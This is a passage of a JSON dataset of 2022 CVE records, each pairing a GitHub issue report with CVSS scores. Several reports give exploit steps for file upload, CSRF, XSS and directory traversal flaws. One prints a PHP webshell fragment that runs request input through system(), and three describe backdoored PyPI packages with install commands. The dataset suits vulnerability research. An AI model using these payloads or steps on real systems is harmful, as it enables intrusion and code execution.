  83360. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/165",
  83361. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/165",
  83362. "Repo_new": "saitoha/libsixel",
  83363. "Issue_Created_At": "2022-04-23T16:47:52Z",
  83364. "description": "Assertion failure in stbi__jpeg_huff_decode, APITAG There is an assertion failure error in stbi__jpeg_huff_decode, APITAG CODETAG FILETAG",
  83365. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83366. "severity": "MEDIUM",
  83367. "baseScore": 6.5,
  83368. "impactScore": 3.6,
  83369. "exploitabilityScore": 2.8
  83370. },
  83371. {
  83372. "CVE_ID": "CVE-2022-29978",
  83373. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/166",
  83374. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/166",
  83375. "Repo_new": "saitoha/libsixel",
  83376. "Issue_Created_At": "2022-04-25T06:12:49Z",
  83377. "description": "FPE in sixel_encoder_do_resize, APITAG Description There is a floating point exception error in sixel_encoder_do_resize, APITAG in img2sixel NUMBERTAG Remote attackers could leverage this vulnerability to cause a denial of service via a crafted JPEG file. Version img2sixel NUMBERTAG commit id URLTAG APITAG Jan NUMBERTAG Reproduction ERRORTAG FILETAG Platform ERRORTAG",
  83378. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83379. "severity": "MEDIUM",
  83380. "baseScore": 6.5,
  83381. "impactScore": 3.6,
  83382. "exploitabilityScore": 2.8
  83383. },
  83384. {
  83385. "CVE_ID": "CVE-2022-30007",
  83386. "Issue_Url_old": "https://github.com/breezety/gxcms15/issues/1",
  83387. "Issue_Url_new": "https://github.com/breezety/gxcms15/issues/1",
  83388. "Repo_new": "breezety/gxcms15",
  83389. "Issue_Created_At": "2022-04-25T12:58:33Z",
  83390. "description": "A file upload vulnerability exists in the background. APITAG code Audit The vulnerability appears in the template management page in the background: FILETAG PATHTAG HTML file is received by filename, content is received by content, and then the data is sent to? S PATHTAG FILETAG Track? S = PATHTAG page PATHTAG class. PHP file, see the Update function to receive the filename and the content variables, only after receiving the two variables for judging whether it is empty, Data is written to the file directly using the write_file function without dangerous character detection for file names and contents, which means there is any file upload vulnerability. FILETAG APITAG exploit Log in to the background of the target website by admin default password admin NUMBERTAG or password blasting or even phishing, click Template Management to enter the PATHTAG directory, select any file and click Edit: FILETAG Enter the EDIT page, enter the PHP test code in the file content form, start the APITAG tool to capture packages, and click Submit: FILETAG After APITAG catches the package, change the filename suffix to PHP and click APITAG the package\" : FILETAG FILETAG file was created successfully, and the PHP test code was successfully executed. FILETAG FILETAG",
  83391. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83392. "severity": "HIGH",
  83393. "baseScore": 7.2,
  83394. "impactScore": 5.9,
  83395. "exploitabilityScore": 1.2
  83396. },
  83397. {
  83398. "CVE_ID": "CVE-2022-30034",
  83399. "Issue_Url_old": "https://github.com/mher/flower/issues/1217",
  83400. "Issue_Url_new": "https://github.com/mher/flower/issues/1217",
  83401. "Repo_new": "mher/flower",
  83402. "Issue_Created_At": "2022-05-26T18:33:06Z",
  83403. "description": "Security Vulnerabilities in Flower: APITAG Authentication Bypass and Lack of CSRF Protections ( CVETAG ). Ref: APITAG Flower is unauthenticated by default and lacks CSRF protections Flower's APITAG support is vulnerable to a bypass allowing anyone to authenticate regardless of the APITAG restriction Due to a lack of response from the maintainer, these issues were publicly disclosed on NUMBERTAG May NUMBERTAG along with a PR NUMBERTAG",
  83404. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
  83405. "severity": "HIGH",
  83406. "baseScore": 8.6,
  83407. "impactScore": 4.7,
  83408. "exploitabilityScore": 3.9
  83409. },
  83410. {
  83411. "CVE_ID": "CVE-2022-30049",
  83412. "Issue_Url_old": "https://github.com/getrebuild/rebuild/issues/460",
  83413. "Issue_Url_new": "https://github.com/getrebuild/rebuild/issues/460",
  83414. "Repo_new": "getrebuild/rebuild",
  83415. "Issue_Created_At": "2022-04-27T12:45:46Z",
  83416. "description": "SSRF vulnerability. Location of vulnerability APITAG request parameter type is the URL FILETAG APITAG APITAG Httpurl. Get to trigger SSRF vulnerability FILETAG Vulnerability proof screenshot FILETAG",
  83417. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  83418. "severity": "HIGH",
  83419. "baseScore": 7.5,
  83420. "impactScore": 3.6,
  83421. "exploitabilityScore": 3.9
  83422. },
  83423. {
  83424. "CVE_ID": "CVE-2022-30288",
  83425. "Issue_Url_old": "https://github.com/ohler55/agoo/issues/109",
  83426. "Issue_Url_new": "https://github.com/ohler55/agoo/issues/109",
  83427. "Repo_new": "ohler55/agoo",
  83428. "Issue_Created_At": "2022-05-04T03:22:12Z",
  83429. "description": "Agoo Fragment Cycle Security Vulnerability. Agoo versions NUMBERTAG and below do not support request validations meaning cycle fragment requests lead to unbounded results causing instances of Agoo to crash. Sample exploit script: CODETAG For more information see: FILETAG Spec ref: URLTAG",
  83430. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83431. "severity": "HIGH",
  83432. "baseScore": 7.5,
  83433. "impactScore": 3.6,
  83434. "exploitabilityScore": 3.9
  83435. },
  83436. {
  83437. "CVE_ID": "CVE-2022-30334",
  83438. "Issue_Url_old": "https://github.com/brave/brave-browser/issues/18071",
  83439. "Issue_Url_new": "https://github.com/brave/brave-browser/issues/18071",
  83440. "Repo_new": "brave/brave-browser",
  83441. "Issue_Created_At": "2021-09-13T23:57:55Z",
  83442. "description": "Strip referrer and origin in cross origin requests from a APITAG origin. If a cross origin request originates from a APITAG service, we should match the Tor Browser behavior and: omit the Referer header send a value of null for the Origin header whenever present (e.g. in the case of a POST request) Same origin requests should follow our normal referrer policy URLTAG . Test page: FILETAG",
  83443. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  83444. "severity": "MEDIUM",
  83445. "baseScore": 5.3,
  83446. "impactScore": 1.4,
  83447. "exploitabilityScore": 3.9
  83448. },
  83449. {
  83450. "CVE_ID": "CVE-2022-30427",
  83451. "Issue_Url_old": "https://github.com/gphper/ginadmin/issues/8",
  83452. "Issue_Url_new": "https://github.com/gphper/ginadmin/issues/8",
  83453. "Repo_new": "gphper/ginadmin",
  83454. "Issue_Created_At": "2022-05-04T09:57:30Z",
  83455. "description": "Directory Traversal Vulnerability. Vulnerability file address APITAG line NUMBERTAG APITAG the incoming path value is not filtered, resulting in directory traversal. ERRORTAG POC URLTAG Attack results pictures FILETAG",
  83456. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  83457. "severity": "HIGH",
  83458. "baseScore": 7.5,
  83459. "impactScore": 3.6,
  83460. "exploitabilityScore": 3.9
  83461. },
  83462. {
  83463. "CVE_ID": "CVE-2022-30428",
  83464. "Issue_Url_old": "https://github.com/gphper/ginadmin/issues/9",
  83465. "Issue_Url_new": "https://github.com/gphper/ginadmin/issues/9",
  83466. "Repo_new": "gphper/ginadmin",
  83467. "Issue_Created_At": "2022-05-04T11:09:36Z",
  83468. "description": "Read Any File Vulnerability. Vulnerability file address APITAG line NUMBERTAG APITAG The incoming path value is not filtered, resulting in arbitrary file reading ERRORTAG POC APITAG Attack results pictures FILETAG",
  83469. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  83470. "severity": "HIGH",
  83471. "baseScore": 7.5,
  83472. "impactScore": 3.6,
  83473. "exploitabilityScore": 3.9
  83474. },
  83475. {
  83476. "CVE_ID": "CVE-2022-30500",
  83477. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/35",
  83478. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/35",
  83479. "Repo_new": "jflyfox/jfinal_cms",
  83480. "Issue_Created_At": "2022-05-07T02:48:35Z",
  83481. "description": "SQLI vul1. There is a SQLI vul in background APITAG route is as following FILETAG vulnerable argument passing is as following FILETAG final injection result with sqlmap FILETAG",
  83482. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83483. "severity": "CRITICAL",
  83484. "baseScore": 9.8,
  83485. "impactScore": 5.9,
  83486. "exploitabilityScore": 3.9
  83487. },
  83488. {
  83489. "CVE_ID": "CVE-2022-30503",
  83490. "Issue_Url_old": "https://github.com/nginx/njs/issues/478",
  83491. "Issue_Url_new": "https://github.com/nginx/njs/issues/478",
  83492. "Repo_new": "nginx/njs",
  83493. "Issue_Created_At": "2022-03-01T10:21:25Z",
  83494. "description": "SEGV src/njs_value.h in njs_set_number. Environment OS : Linux leanderwang LC NUMBERTAG generic URLTAG APITAG Ubuntu SMP Mon Feb NUMBERTAG UTC NUMBERTAG APITAG Commit : URLTAG Version NUMBERTAG Build : NJS_CFLAGS=\"$NJS_CFLAGS fsanitize=address\" NJS_CFLAGS=\"$NJS_CFLAGS fno omit frame pointer\" APITAG function APITAG { var arr NUMBERTAG new APITAG var arr NUMBERTAG APITAG = arr NUMBERTAG ar arr_fill = APITAG var func = ERRORTAG ; } APITAG Stack dump APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG e3b NUMBERTAG caa8 (pc NUMBERTAG e3b1e NUMBERTAG bp NUMBERTAG fffe5a NUMBERTAG sp NUMBERTAG fffe5a NUMBERTAG T0) APITAG signal is caused by a WRITE memory access NUMBERTAG e3b1e NUMBERTAG in njs_set_number src/njs_value.h NUMBERTAG e3b1e NUMBERTAG in njs_typed_array_set_value APITAG NUMBERTAG e3b0d7ba6 in njs_value_property_set src/njs_value.c NUMBERTAG e3b NUMBERTAG af in njs_value_property_i NUMBERTAG set APITAG NUMBERTAG e3b NUMBERTAG af in njs_array_prototype_fill APITAG NUMBERTAG e3b NUMBERTAG d NUMBERTAG c in njs_function_native_call APITAG NUMBERTAG e3b0e NUMBERTAG fb in njs_vmcode_interpreter APITAG NUMBERTAG e3b NUMBERTAG caba in njs_function_lambda_call APITAG NUMBERTAG e3b0e NUMBERTAG fb in njs_vmcode_interpreter APITAG NUMBERTAG e3b0dd0ba in njs_vm_start APITAG NUMBERTAG e3b0c NUMBERTAG f8 in njs_process_script APITAG NUMBERTAG e3b0c6ebf in njs_process_file APITAG NUMBERTAG e3b0c NUMBERTAG f in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG e3b0c3c4d in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV src/njs_value.h in njs_set_number NUMBERTAG ABORTING Credit xmzyshypnc( APITAG and P1umer( APITAG",
  83495. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  83496. "severity": "MEDIUM",
  83497. "baseScore": 5.5,
  83498. "impactScore": 3.6,
  83499. "exploitabilityScore": 1.8
  83500. },
  83501. {
  83502. "CVE_ID": "CVE-2022-30517",
  83503. "Issue_Url_old": "https://github.com/moxi624/mogu_blog_v2/issues/65",
  83504. "Issue_Url_new": "https://github.com/moxi624/mogu_blog_v2/issues/65",
  83505. "Repo_new": "moxi624/mogu_blog_v2",
  83506. "Issue_Created_At": "2022-05-08T11:03:25Z",
  83507. "description": "Mogu blog has a vulnerability to upload arbitrary files. Using mogu NUMBERTAG mogu NUMBERTAG to log in the Mogu blog. FILETAG FILETAG FILETAG Choose User Center > User Avatar > Image FILETAG FILETAG At this point, use the burp suite to capture the request packet. Use the Repeater module in APITAG Try to change the file contents in the request package to the XSS payload and try to change the file name to the HTML suffix. You can see the successful upload and the file path in the response package. FILETAG Open your browser to access the HTML file you just uploaded FILETAG",
  83508. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  83509. "severity": "MEDIUM",
  83510. "baseScore": 6.1,
  83511. "impactScore": 2.7,
  83512. "exploitabilityScore": 2.8
  83513. },
  83514. {
  83515. "CVE_ID": "CVE-2022-30708",
  83516. "Issue_Url_old": "https://github.com/webmin/webmin/issues/1635",
  83517. "Issue_Url_new": "https://github.com/webmin/webmin/issues/1635",
  83518. "Repo_new": "webmin/webmin",
  83519. "Issue_Created_At": "2022-05-14T16:41:01Z",
  83520. "description": "RCE and privesc on safe user. We were RCE hunting on live stream, sorry for the poc. URLTAG URLTAG Please patch.",
  83521. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  83522. "severity": "HIGH",
  83523. "baseScore": 8.8,
  83524. "impactScore": 5.9,
  83525. "exploitabilityScore": 2.8
  83526. },
  83527. {
  83528. "CVE_ID": "CVE-2022-30860",
  83529. "Issue_Url_old": "https://github.com/fudforum/FUDforum/issues/23",
  83530. "Issue_Url_new": "https://github.com/fudforum/fudforum/issues/23",
  83531. "Repo_new": "fudforum/fudforum",
  83532. "Issue_Created_At": "2022-05-10T07:54:26Z",
  83533. "description": "Remote code execution bug. Remote code execution with File Administration System feature in Admin Control Panel Site Affected Version NUMBERTAG Demo installation: FILETAG Steps to reproduce the bug NUMBERTAG go to FILETAG and login with admin account NUMBERTAG go to Admin Control panel and access to URLTAG NUMBERTAG Use File to upload Feature in File Administration System to Upload PHP Webshell PHP to Webroot Directory APITAG payload: APITAG \"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \" APITAG \"; die NUMBERTAG Access to webshell and get remote execution code. Example : URLTAG",
  83534. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83535. "severity": "HIGH",
  83536. "baseScore": 7.2,
  83537. "impactScore": 5.9,
  83538. "exploitabilityScore": 1.2
  83539. },
  83540. {
  83541. "CVE_ID": "CVE-2022-30861",
  83542. "Issue_Url_old": "https://github.com/fudforum/FUDforum/issues/24",
  83543. "Issue_Url_new": "https://github.com/fudforum/fudforum/issues/24",
  83544. "Repo_new": "fudforum/fudforum",
  83545. "Issue_Created_At": "2022-05-10T09:38:47Z",
  83546. "description": "Cross Site Scripting. What is XSS Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. Affected Version NUMBERTAG Demo installation: FILETAG Reproduce bug: Step NUMBERTAG Login with admin account and go to the Admin Control Panel. Step NUMBERTAG In Categories & Forums, use Forum Manager to add new Forum to Private Forums. Step NUMBERTAG Inject XSS payload to Forum Name field and complete Add Forum XSS payload : a APITAG Step NUMBERTAG Go back to FILETAG > XSS trigger Impact of XSS: If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can: Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user. With the help of XSS a hacker or attacker can perform social engineering on users by redirecting them from real website to fake one. hacker can steal their cookies and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
  83547. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  83548. "severity": "MEDIUM",
  83549. "baseScore": 4.8,
  83550. "impactScore": 2.7,
  83551. "exploitabilityScore": 1.7
  83552. },
  83553. {
  83554. "CVE_ID": "CVE-2022-30877",
  83555. "Issue_Url_old": "https://github.com/OrkoHunter/keep/issues/85",
  83556. "Issue_Url_new": "https://github.com/orkohunter/keep/issues/85",
  83557. "Repo_new": "orkohunter/keep",
  83558. "Issue_Created_At": "2022-05-11T11:13:20Z",
  83559. "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip3 install keep NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  83560. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83561. "severity": "CRITICAL",
  83562. "baseScore": 9.8,
  83563. "impactScore": 5.9,
  83564. "exploitabilityScore": 3.9
  83565. },
  83566. {
  83567. "CVE_ID": "CVE-2022-30882",
  83568. "Issue_Url_old": "https://github.com/egeback/pyanxdns/issues/1",
  83569. "Issue_Url_new": "https://github.com/egeback/pyanxdns/issues/1",
  83570. "Repo_new": "egeback/pyanxdns",
  83571. "Issue_Created_At": "2022-05-14T02:36:51Z",
  83572. "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip3 install pyanxdns NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  83573. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83574. "severity": "CRITICAL",
  83575. "baseScore": 9.8,
  83576. "impactScore": 5.9,
  83577. "exploitabilityScore": 3.9
  83578. },
  83579. {
  83580. "CVE_ID": "CVE-2022-30885",
  83581. "Issue_Url_old": "https://github.com/esdc-esac-esa-int/pyesasky/issues/39",
  83582. "Issue_Url_new": "https://github.com/esdc-esac-esa-int/pyesasky/issues/39",
  83583. "Repo_new": "esdc-esac-esa-int/pyesasky",
  83584. "Issue_Created_At": "2022-05-14T07:41:14Z",
  83585. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip3 install pyesasky NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  83586. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83587. "severity": "CRITICAL",
  83588. "baseScore": 9.8,
  83589. "impactScore": 5.9,
  83590. "exploitabilityScore": 3.9
  83591. },
  83592. {
  83593. "CVE_ID": "CVE-2022-30898",
  83594. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/37",
  83595. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/37",
  83596. "Repo_new": "chshcms/cscms",
  83597. "Issue_Created_At": "2022-05-12T08:31:17Z",
  83598. "description": "Cross site request forgery vulnerability exists in Cscms music portal system NUMBERTAG details In cscms NUMBERTAG A problem was found in NUMBERTAG Cross site request forgery (CSRF) vulnerability in PATHTAG allow remote attackers to change Trigger condition: the administrator clicks a malicious link Cause of vulnerability: We can find that this script has no anti CSRF mechanism. Exploit: Login administrator click URL: FILETAG csrf. html\uff1a CODETAG PATHTAG FILETAG administrator Click FILETAG success FILETAG The password has been successfully changed to NUMBERTAG FILETAG Repair method: Join the random token check",
  83599. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  83600. "severity": "MEDIUM",
  83601. "baseScore": 6.5,
  83602. "impactScore": 3.6,
  83603. "exploitabilityScore": 2.8
  83604. },
  83605. {
  83606. "CVE_ID": "CVE-2022-30974",
  83607. "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/162",
  83608. "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/162",
  83609. "Repo_new": "ccxvii/mujs",
  83610. "Issue_Created_At": "2022-05-15T11:55:53Z",
  83611. "description": "FILETAG Credit FILETAG FILETAG",
  83612. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83613. "severity": "MEDIUM",
  83614. "baseScore": 5.5,
  83615. "impactScore": 3.6,
  83616. "exploitabilityScore": 1.8
  83617. },
  83618. {
  83619. "CVE_ID": "CVE-2022-30975",
  83620. "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/161",
  83621. "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/161",
  83622. "Repo_new": "ccxvii/mujs",
  83623. "Issue_Created_At": "2022-05-13T14:42:02Z",
  83624. "description": "FILETAG Credit FILETAG FILETAG",
  83625. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83626. "severity": "MEDIUM",
  83627. "baseScore": 5.5,
  83628. "impactScore": 3.6,
  83629. "exploitabilityScore": 1.8
  83630. },
  83631. {
  83632. "CVE_ID": "CVE-2022-30976",
  83633. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2179",
  83634. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2179",
  83635. "Repo_new": "gpac/gpac",
  83636. "Issue_Created_At": "2022-04-25T14:26:20Z",
  83637. "description": "FILETAG FILETAG POC FILETAG",
  83638. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  83639. "severity": "HIGH",
  83640. "baseScore": 7.1,
  83641. "impactScore": 5.2,
  83642. "exploitabilityScore": 1.8
  83643. },
  83644. {
  83645. "CVE_ID": "CVE-2022-31015",
  83646. "Issue_Url_old": "https://github.com/Pylons/waitress/issues/374",
  83647. "Issue_Url_new": "https://github.com/pylons/waitress/issues/374",
  83648. "Repo_new": "pylons/waitress",
  83649. "Issue_Created_At": "2022-04-11T16:47:59Z",
  83650. "description": "Possible race condition leading to the main loop dying?. I just might be wrong because if this indeed a race condition it should be breaking more things. Anyway, I got this exception (line numbers might be wrong due to debug statements): ERRORTAG This error was extremely rare but since I was getting it while running tests I could just run a lot of them until one failed, which I did, and I think the problem is a follows NUMBERTAG First, thread APITAG that the app I'm testing is launching, one that runs waitress server, assembles the descriptor lists for select : URLTAG NUMBERTAG Then, thread APITAG deletes one of the channels, in my case it was ERRORTAG , and immediately closes the socket: URLTAG Stack of APITAG at the moment: ERRORTAG NUMBERTAG Then, thread APITAG is trying to see if the file descriptor of the socked closed above is writable, which leads to the the exception above: URLTAG Python NUMBERTAG waitress NUMBERTAG Ubuntu NUMBERTAG LTS focal @ WSL2",
  83651. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83652. "severity": "MEDIUM",
  83653. "baseScore": 5.9,
  83654. "impactScore": 3.6,
  83655. "exploitabilityScore": 2.2
  83656. },
  83657. {
  83658. "CVE_ID": "CVE-2022-31051",
  83659. "Issue_Url_old": "https://github.com/semantic-release/semantic-release/issues/2449",
  83660. "Issue_Url_new": "https://github.com/semantic-release/semantic-release/issues/2449",
  83661. "Repo_new": "semantic-release/semantic-release",
  83662. "Issue_Created_At": "2022-06-03T10:27:20Z",
  83663. "description": "Credentials are revealed in log. Current behavior Credentials are revealed in the logs (see example below): APITAG Expected behavior Credentials should be hidden (see example below); APITAG Environment semantic release version NUMBERTAG CI environment: APITAG Plugins used: commit analyzer, release notes generator, changelog, exec, git semantic release configuration: CODETAG CI logs: see above for the relevant log entry We are using semantic release in combination with Bitbucket Server. Credentials are passed via environment variable BITBUCKET_TOKEN_BASIC_AUTH. AFAIK this should be the relevant line that reveals (logs) the sensitive data: URLTAG",
  83664. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  83665. "severity": "HIGH",
  83666. "baseScore": 7.5,
  83667. "impactScore": 3.6,
  83668. "exploitabilityScore": 3.9
  83669. },
  83670. {
  83671. "CVE_ID": "CVE-2022-31054",
  83672. "Issue_Url_old": "https://github.com/argoproj/argo-events/issues/1946",
  83673. "Issue_Url_new": "https://github.com/argoproj/argo-events/issues/1946",
  83674. "Repo_new": "argoproj/argo-events",
  83675. "Issue_Created_At": "2022-05-10T17:48:31Z",
  83676. "description": "8 Uses of deprecated API can be used to cause APITAG in user facing endpoints. APITAG APITAG APITAG Severity | Medium | Difficulty | Medium Target | \u00a0 APITAG APITAG APITAG APITAG Several APITAG APITAG APITAG APITAG APITAG endpoints make use of the deprecated APITAG APITAG APITAG APITAG APITAG . APITAG APITAG APITAG APITAG APITAG reads all the data into memory. As such, an attacker who sends a large request to the Argo Events server will be able to crash it and cause denial of service. APITAG APITAG APITAG APITAG APITAG Eventsources susceptible to an out of memory denial of service attack: APITAG APITAG APITAG APITAG APITAG APITAG APITAG AWS SNS APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Bitbucket APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Bitbucket Server APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Gitlab APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Slack APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Storagegrid APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Webhook APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Note that the Stripe Event Source uses APITAG APITAG APITAG APITAG APITAG but limits the size of the request body: APITAG APITAG APITAG URLTAG APITAG APITAG APITAG APITAG APITAG APITAG Since APITAG APITAG io/ioutil APITAG APITAG has ceased maintenance we recommend discontinuing all use of this package. APITAG APITAG Severity Medium Difficulty Medium Target Several APITAG endpoints make use of the deprecated APITAG APITAG reads all the data into memory. As such, an attacker who sends a large request to the Argo Events server will be able to crash it and cause denial of service. Eventsources susceptible to an out of memory denial of service attack: AWS SNS URLTAG Bitbucket URLTAG Bitbucket Server Gitlab URLTAG Slack URLTAG Storagegrid URLTAG Webhook URLTAG Note that the Stripe Event Source uses APITAG but limits the size of the request body: URLTAG Since io/ioutil has ceased maintenance we recommend discontinuing all use of this package.",
  83677. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83678. "severity": "HIGH",
  83679. "baseScore": 7.5,
  83680. "impactScore": 3.6,
  83681. "exploitabilityScore": 3.9
  83682. },
  83683. {
  83684. "CVE_ID": "CVE-2022-31103",
  83685. "Issue_Url_old": "https://github.com/mat-sz/react-letter/issues/17",
  83686. "Issue_Url_new": "https://github.com/mat-sz/react-letter/issues/17",
  83687. "Repo_new": "mat-sz/react-letter",
  83688. "Issue_Created_At": "2022-06-22T03:19:11Z",
  83689. "description": "NUMBERTAG cpu cost and lagging. In production I have issue with this html. If use APITAG there is no error, but if use react letter CPU will hold on NUMBERTAG and the browser will be unresponded Please check FILETAG .",
  83690. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83691. "severity": "HIGH",
  83692. "baseScore": 7.5,
  83693. "impactScore": 3.6,
  83694. "exploitabilityScore": 3.9
  83695. },
  83696. {
  83697. "CVE_ID": "CVE-2022-31110",
  83698. "Issue_Url_old": "https://github.com/DIYgod/RSSHub/issues/10045",
  83699. "Issue_Url_new": "https://github.com/diygod/rsshub/issues/10045",
  83700. "Repo_new": "diygod/rsshub",
  83701. "Issue_Created_At": "2022-06-26T18:02:17Z",
  83702. "description": "Vulnerability Report Disclosure: APITAG Catastrophic Backtracking in User supplied Regular Expression. Routes routes NOROUTE Full routes fullroutes NOROUTE Related documentation NOROUTE What is expected? The vulnerability has been fixed (refer to the [security advisory URLTAG . According to the consultation with MENTIONTAG this is a complete disclosure of the vulnerability report, disclosed NUMBERTAG hours after the fix commit. FILETAG \u7b80\u8981\u7684\u7b80\u4f53\u4e2d\u6587\u7ffb\u8bd1\u9644\u5728\u4e0b\u4e00\u6761\u56de\u590d\u3002 Vulnerability Report APITAG Regular expression Denial of Service APITAG Catastrophic Backtracking in User supplied Regular Expression Author: Rongrong APITAG POC APITAG reporting to the repository owner, the vulnerability has been fixed (refer to the security advisory URLTAG . To reproduce the vulnerability, a version before APITAG (inclusive) is needed NUMBERTAG Follow the FILETAG to deploy an APITAG instance in any method (except Vercel or GAE NUMBERTAG APITAG NUMBERTAG The instance is now unresponsive to any request APITAG of Service NUMBERTAG Monitor the CPU usage of the process APITAG . It is now always occupying a whole CPU core. It can last for at least several hours. EXP APITAG is an APITAG instance. APITAG can be nearly any \"route\" of APITAG filter , APITAG , APITAG , APITAG , filterout , APITAG , APITAG , and APITAG are all so called parameters of APITAG which can be supplied in the URI query. These parameters accept user supplied regular expressions with unconditional trust, then call APITAG to perform regular expression matches. All of these parameters are vulnerable. APITAG is the URL encoded form of the regular expression / APITAG /. The POC shows a catastrophic backtracking vulnerable regular expression specially designed for any HTML. But most catastrophic backtracking vulnerable regular expression may be able to construct an effective APITAG attack (refer to the APITAG back\" chapter for more details). Once catastrophic backtracking occurs, APITAG can take more than several hours to finish. APITAG is no timeout enforced, causing the APITAG attack to become \"zero cost\": attack once, down for hours. APITAG On multi core servers, the APITAG attack can probably only affect the APITAG instance itself; while APITAG on single core servers, especially VPS NUMBERTAG it can be a disaster. APITAG The component cannot be disabled. APITAG APITAG instance is vulnerable \"out of box\" APITAG unless additional access control is applied. If an external watchdog or timeout is enforced (e.g. Vercel, GAE), the downtime of each effective attack can be limited. However, the instance must be terminated first in order to resume it, so the attack cost is still too low NUMBERTAG Most VPS providers take the advantage of a technology called \"CPU credits\". If a VPS has a high CPU load continuously, it can possibly consume all remaining CPU credits, causing the VPS provider to limit the performance to a fairly low level. Even if the high load ends, it can take at least several hours before there are enough CPU credits to make the performance resume. Vulnerable version Since Git hash APITAG Pull Request NUMBERTAG on APITAG which was merge on Feb NUMBERTAG months ago). APITAG in APITAG Condition to be vulnerable Unless additional access control is applied. If an external watchdog or timeout is enforced, the downtime can be limited but the instance is still vulnerable. Vulnerability 